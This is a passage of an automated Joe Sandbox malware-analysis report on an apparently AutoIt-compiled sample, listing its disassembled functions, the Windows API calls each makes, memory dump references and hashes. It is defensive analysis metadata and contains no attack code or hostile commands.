                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$Release
                                                                                        • String ID:
                                                                                        • API String ID: 1035833867-0
                                                                                        • Opcode ID: 1f33a2afb6efb72778ad5fab41ab9ae5bd11cc1cdf51040fdf0e04f602403027
                                                                                        • Instruction ID: 96330b90a3edb7abd6b09fe5248f0bddb805de81364577294efc3cd571d044f3
                                                                                        • Opcode Fuzzy Hash: 1f33a2afb6efb72778ad5fab41ab9ae5bd11cc1cdf51040fdf0e04f602403027
                                                                                        • Instruction Fuzzy Hash: D2014875E00218BBDF105BE69D45A5EBFB8EF48761F104065FA04AB240DA709D10CF51
                                                                                        Function 00B2C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA1729
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1738
                                                                                          • Part of subcall function 00AA16CF: BeginPath.GDI32(?), ref: 00AA174F
                                                                                          • Part of subcall function 00AA16CF: SelectObject.GDI32(?,00000000), ref: 00AA1778
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B2C57C
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00B2C590
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B2C59E
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00B2C5AE
                                                                                        • EndPath.GDI32(00000000), ref: 00B2C5BE
                                                                                        • StrokePath.GDI32(00000000), ref: 00B2C5CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: a6927655ae4d2d3b47820055e23d628fd9cca7c08441897881a711fa7742c908
                                                                                        • Instruction ID: 3f3dc6ff47ff1abb1ef6f0937c5480bf794ba65d04e77f3e7c54ed7a90a97ae6
                                                                                        • Opcode Fuzzy Hash: a6927655ae4d2d3b47820055e23d628fd9cca7c08441897881a711fa7742c908
                                                                                        • Instruction Fuzzy Hash: 57110C7200010CBFDF02AF91DC89E9A7FADEF08354F148061F9185A1A1CB71AE55DBA0
                                                                                        Function 00AC07BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC07EC
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC07F4
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC07FF
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC080A
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC0812
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC081A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: 3487492dba81ce53d4e1077319d0c77548f87054eec09b55d27528ee2a038c7e
                                                                                        • Instruction ID: 8288516cfcc0fecd6e80b58bff483bedf226b1a9cf9a2874e9c257bda6c450d6
                                                                                        • Opcode Fuzzy Hash: 3487492dba81ce53d4e1077319d0c77548f87054eec09b55d27528ee2a038c7e
                                                                                        • Instruction Fuzzy Hash: 32016CB09017597DE3009F5A8C85B56FFE8FF59354F00411BA15C47941C7F5A864CBE5
                                                                                        Function 00B059A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B059B4
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B059CA
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00B059D9
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059E8
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F2
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B059F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: df021b9274914c365f85268779983bea7d9f84599e0679c48195fe207a5b9a4e
                                                                                        • Instruction ID: a6faf29e68f67a38920159ac0aa488d146cb51e818f6929c5212af7f0051cad3
                                                                                        • Opcode Fuzzy Hash: df021b9274914c365f85268779983bea7d9f84599e0679c48195fe207a5b9a4e
                                                                                        • Instruction Fuzzy Hash: 03F03A32251558BBE7216B929C0EEEF7F7CEFCAB21F100159FA05E2050EFA01A1187B5
                                                                                        Function 00B077EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00B077FE
                                                                                        • EnterCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B0780F
                                                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,00AAC2B6,?,?), ref: 00B0781C
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AAC2B6,?,?), ref: 00B07829
                                                                                          • Part of subcall function 00B071F0: CloseHandle.KERNEL32(00000000,?,00B07836,?,00AAC2B6,?,?), ref: 00B071FA
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B0783C
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00AAC2B6,?,?), ref: 00B07843
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: 2ee4ecc746afe70d79d6888e359278204ce972809e70137bf38026cc6a3841b5
                                                                                        • Instruction ID: 65c38432de1258fb2e99af7f44f00de00725a821d2ef633dcd778f6a3df182b1
                                                                                        • Opcode Fuzzy Hash: 2ee4ecc746afe70d79d6888e359278204ce972809e70137bf38026cc6a3841b5
                                                                                        • Instruction Fuzzy Hash: E8F05832595612ABD7113B64EC9CAAFBB69FF49702B244461F602A60A1CFB56801CB60
                                                                                        Function 00AF954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF9555
                                                                                        • UnloadUserProfile.USERENV(?,?), ref: 00AF9561
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF956A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00AF9572
                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF957B
                                                                                        • HeapFree.KERNEL32(00000000), ref: 00AF9582
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                        • String ID:
                                                                                        • API String ID: 146765662-0
                                                                                        • Opcode ID: 0071397d9cdd40f54e4eac5180770f240ba7e6853cc1df5d170d1d1652d1b435
                                                                                        • Instruction ID: ced705ebf1531a744b434b851aacc33604db721d481091142b2926dc1484f3c5
                                                                                        • Opcode Fuzzy Hash: 0071397d9cdd40f54e4eac5180770f240ba7e6853cc1df5d170d1d1652d1b435
                                                                                        • Instruction Fuzzy Hash: 8CE0E536014505BBDB012FE2EC1C95EBF39FF49B22B204220F22592470CF32A460DB50
                                                                                        Function 00B18CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B18CFD
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B18E0C
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18F84
                                                                                          • Part of subcall function 00B07B1D: VariantInit.OLEAUT32(00000000), ref: 00B07B5D
                                                                                          • Part of subcall function 00B07B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00B07B66
                                                                                          • Part of subcall function 00B07B1D: VariantClear.OLEAUT32(00000000), ref: 00B07B72
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: 37c8543490f67999a4fdcefb7abe0ccacad9b26ea8ca7262f13be9abe9eb5e80
                                                                                        • Instruction ID: 0167614c0692d6b01990424324019fdd5603dbb5db9d844c62a4c7bcb6b98d12
                                                                                        • Opcode Fuzzy Hash: 37c8543490f67999a4fdcefb7abe0ccacad9b26ea8ca7262f13be9abe9eb5e80
                                                                                        • Instruction Fuzzy Hash: 69919C716083019FC710DF24C58099ABBF5FF89354F5489AEF89A8B3A2DB31E945CB52
                                                                                        Function 00B0323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB436A: _wcscpy.LIBCMT ref: 00AB438D
                                                                                        • _memset.LIBCMT ref: 00B0332E
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B0335D
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B03410
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B0343E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 4152858687-4108050209
                                                                                        • Opcode ID: 846078983b685ec2705f9cfed7f8dcf149d100dca288d592c16cfac948e93324
                                                                                        • Instruction ID: 0343461d9cec5e0a7c0d7d9f78533b37f766c17744b91878b538d3a6a1853f57
                                                                                        • Opcode Fuzzy Hash: 846078983b685ec2705f9cfed7f8dcf149d100dca288d592c16cfac948e93324
                                                                                        • Instruction Fuzzy Hash: 8451EF316083009FC7169E28C989A6FBFECEF45B54F040AADF891972D2DB20CE448756
                                                                                        Function 00B02EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B02F67
                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B02F83
                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00B02FC9
                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B67890,00000000), ref: 00B03012
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1173514356-4108050209
                                                                                        • Opcode ID: e9302c02e26b6816a40f9d4146bf8f73bb4d38ad5457e6d6153ce10a1a1ec006
                                                                                        • Instruction ID: 67fac127a7a007042f2fe73ee7c87ce335c0d407f26cbba4f77e11bd639f6257
                                                                                        • Opcode Fuzzy Hash: e9302c02e26b6816a40f9d4146bf8f73bb4d38ad5457e6d6153ce10a1a1ec006
                                                                                        • Instruction Fuzzy Hash: D841B1312053419FD720DF24C898B5ABFE8EF84750F10469DF565972D1EB70EA05CB52
                                                                                        Function 00AF9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF9ACC
                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF9ADF
                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF9B0F
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$_memmove$ClassName
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 365058703-1403004172
                                                                                        • Opcode ID: 5cf046f207381a8d0ff3fcddd676b04f40c04a4dba03f54a8db30679aa5906e0
                                                                                        • Instruction ID: 8a412fc50a2966afb994587ca452fb29def481de5117644b8b7dd069f02079d8
                                                                                        • Opcode Fuzzy Hash: 5cf046f207381a8d0ff3fcddd676b04f40c04a4dba03f54a8db30679aa5906e0
                                                                                        • Instruction Fuzzy Hash: B8212371A01108BFDB14ABE4DC96EFFBBBCDF51360F104219F921A32E1DB3459098660
                                                                                        Function 00B26A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
                                                                                          • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
                                                                                          • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
                                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B26A86
                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B26A8D
                                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B26AA2
                                                                                        • DestroyWindow.USER32(?), ref: 00B26AAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                        • String ID: SysAnimate32
                                                                                        • API String ID: 4146253029-1011021900
                                                                                        • Opcode ID: e62cd11e4d30debd28262c8f032d05cee32ae65a7a7ed2a15dcb407e16f63411
                                                                                        • Instruction ID: e2c6aad0b03932550427784b43fa878fa1a1749e66c391e9f894de87f7806753
                                                                                        • Opcode Fuzzy Hash: e62cd11e4d30debd28262c8f032d05cee32ae65a7a7ed2a15dcb407e16f63411
                                                                                        • Instruction Fuzzy Hash: F1218B71200215AFEF108E64EC81EBB77EDEF6A324F208658FA59A3194D7719C519760
                                                                                        Function 00B07357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00B07377
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B073AA
                                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00B073BC
                                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B073F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: 08096ee1cdffeaccdae6965b63ed16b551046db91d833cd274241ba1efe70170
                                                                                        • Instruction ID: aa2acefec231b6eda0dfc2d5893ec41d1fc9c7b9c22628d06b6c64b8a8d7ede0
                                                                                        • Opcode Fuzzy Hash: 08096ee1cdffeaccdae6965b63ed16b551046db91d833cd274241ba1efe70170
                                                                                        • Instruction Fuzzy Hash: C421717094430AABEB209F65DC45A9ABFE4EF45720F204A99FCA0D72D0DF70A851DB54
                                                                                        Function 00B07425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B07444
                                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B07476
                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00B07487
                                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B074C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHandle$FilePipe
                                                                                        • String ID: nul
                                                                                        • API String ID: 4209266947-2873401336
                                                                                        • Opcode ID: e28de60d19bbf3ceb2baa82ef4cbdabe404e368bf362d1cfea3505907c1a9a4a
                                                                                        • Instruction ID: 553ba4113c94217573b913d3c2c4ede02d699572913401aadff715ad7823179b
                                                                                        • Opcode Fuzzy Hash: e28de60d19bbf3ceb2baa82ef4cbdabe404e368bf362d1cfea3505907c1a9a4a
                                                                                        • Instruction Fuzzy Hash: 5C21B231948209ABDB209F689C44E9EBFE8EF45720F200A89FDA0E73D1DF70A851C750
                                                                                        Function 00B0B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00B0B297
                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0B2EB
                                                                                        • __swprintf.LIBCMT ref: 00B0B304
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B30980), ref: 00B0B342
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                                        • String ID: %lu
                                                                                        • API String ID: 3164766367-685833217
                                                                                        • Opcode ID: 09ef6d0465093464c0155afb6de07b158515a5142d77688e6d9ea57b51020f5b
                                                                                        • Instruction ID: 71f58ea07b4e7c9ac8a0da182e11d28300a6f623e15dbaa4727c52c0c82fb39f
                                                                                        • Opcode Fuzzy Hash: 09ef6d0465093464c0155afb6de07b158515a5142d77688e6d9ea57b51020f5b
                                                                                        • Instruction Fuzzy Hash: 44215635600109AFCB10EFA5CD95EAEBBF8EF89704B1040A9F905D7392DB71EA45CB61
